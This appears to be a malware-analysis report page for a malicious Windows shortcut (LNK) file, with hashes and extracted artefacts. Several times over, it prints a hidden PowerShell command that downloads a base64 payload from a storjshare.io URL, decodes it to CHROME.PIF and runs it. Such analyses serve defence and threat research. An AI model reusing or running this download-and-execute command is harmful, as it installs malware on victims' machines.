a1ceb4baf68db35a5a77e8334c55627dc7b3e0[...]lnk.bin

LNK File
|
MD5: 517894ae1fa916c690143d1f1f707579
|
Size: 202.63 KB
|
application/x-ms-shortcut

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	517894ae1fa916c690143d1f1f707579
Sha1	1e02e38ab215816599daabb967352fc399c4c916
Sha256	a1ceb4baf68db35a5a77e8334c55627dc7b3e0894fd069f0a6063a1a2dc4cd8f
Sha384	609e79bf4f2b85673cbf15f31a8a4ce4cf66f140e3e20a4fa569907f215bde5fd5bb3732d2eb38fe8e19883094b474a2
Sha512	13114778a435edbd91bfa3f7f8ec727bebe250ad2f31ced821539d86b80de6691993cb960f18efeb9c3a3c98345c49779ce1f5da8d0a0024d8f060cc8eb2aab9
SSDeep	6144:EzrUaNaATUvtXGM1iI2G600hGLtDmx20a79D019:MDNXiXGM1iDx5hGLRm894D
TLSH	1614F224DB2A0BD9FD2D0DBC0C6E665A4CCD7E313C12CCF9C99B150B4525AD756A2C2B

File Structure

Artefacts

Name0	Value
LNK: Command Execution	powershell.exe -WindowStyle hidden -noLogo -Command -NoExit (new-object System.Net.WebClient).DownloadFile('https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt','C:\\Users\\Public\\png'); $file = 'C:\\Users\\Public\\png'; [System.Convert]::FromBase64String((Get-Content $file)) \| Set-Content C:\\Users\\Public\\CHROME.PIF -Encoding Byte; start C:\\Users\\Public\\CHROME.PIF;
Deobfuscated PowerShell	-windowstyle "hidden" -noLogo -Command -NoExit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"
Deobfuscated PowerShell	-windowstyle "hidden" -noLogo -Command -NoExit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"
Deobfuscated PowerShell	-noexit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"
Deobfuscated PowerShell	-noexit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF"

a1ceb4baf68db35a5a77e8334c55627dc7b3e0894fd069f0a6063a1a2dc4cd8f.lnk.bin (202.63 KB)

File Structure

Characteristics

No malware configuration were found at this point.

Artefacts

Name0	Value	Location
LNK: Command Execution	powershell.exe -WindowStyle hidden -noLogo -Command -NoExit (new-object System.Net.WebClient).DownloadFile('https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt','C:\\Users\\Public\\png'); $file = 'C:\\Users\\Public\\png'; [System.Convert]::FromBase64String((Get-Content $file)) \| Set-Content C:\\Users\\Public\\CHROME.PIF -Encoding Byte; start C:\\Users\\Public\\CHROME.PIF; Malicious	a1ceb4baf68db35a5a77e8334c55627dc7b3e0894fd069f0a6063a1a2dc4cd8f.lnk.bin
Deobfuscated PowerShell	-windowstyle "hidden" -noLogo -Command -NoExit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF" Malicious	a1ceb4baf68db35a5a77e8334c55627dc7b3e0894fd069f0a6063a1a2dc4cd8f.lnk.bin > LNK CommandLine
Deobfuscated PowerShell	-windowstyle "hidden" -noLogo -Command -NoExit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF" Malicious	a1ceb4baf68db35a5a77e8334c55627dc7b3e0894fd069f0a6063a1a2dc4cd8f.lnk.bin > LNK CommandLine > [Deobfuscated PS]
Deobfuscated PowerShell	-noexit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF" Malicious	a1ceb4baf68db35a5a77e8334c55627dc7b3e0894fd069f0a6063a1a2dc4cd8f.lnk.bin > LNK CommandLine > [PowerShell Command]
Deobfuscated PowerShell	-noexit (New-Object "System.Net.WebClient")."DownloadFile"("https://link.storjshare.io/raw/jxhn64sg5f3hjwqbbctalsw4ivsa/office/r.txt", "C:\\Users\\Public\\png") $file = "C:\\Users\\Public\\png" [Convert]::"FromBase64String"((Get-Content $file)) \| Set-Content "C:\\Users\\Public\\CHROME.PIF" -Encoding "Byte" start "C:\\Users\\Public\\CHROME.PIF" Malicious	a1ceb4baf68db35a5a77e8334c55627dc7b3e0894fd069f0a6063a1a2dc4cd8f.lnk.bin > LNK CommandLine > [PowerShell Command] > [Deobfuscated PS]

You must be signed in to post a comment.

a1ceb4baf68db35a5a77e8334c55627dc7b3e0[...]lnk.bin

LNK File | MD5: 517894ae1fa916c690143d1f1f707579 | Size: 202.63 KB | application/x-ms-shortcut

LNK File
|
MD5: 517894ae1fa916c690143d1f1f707579
|
Size: 202.63 KB
|
application/x-ms-shortcut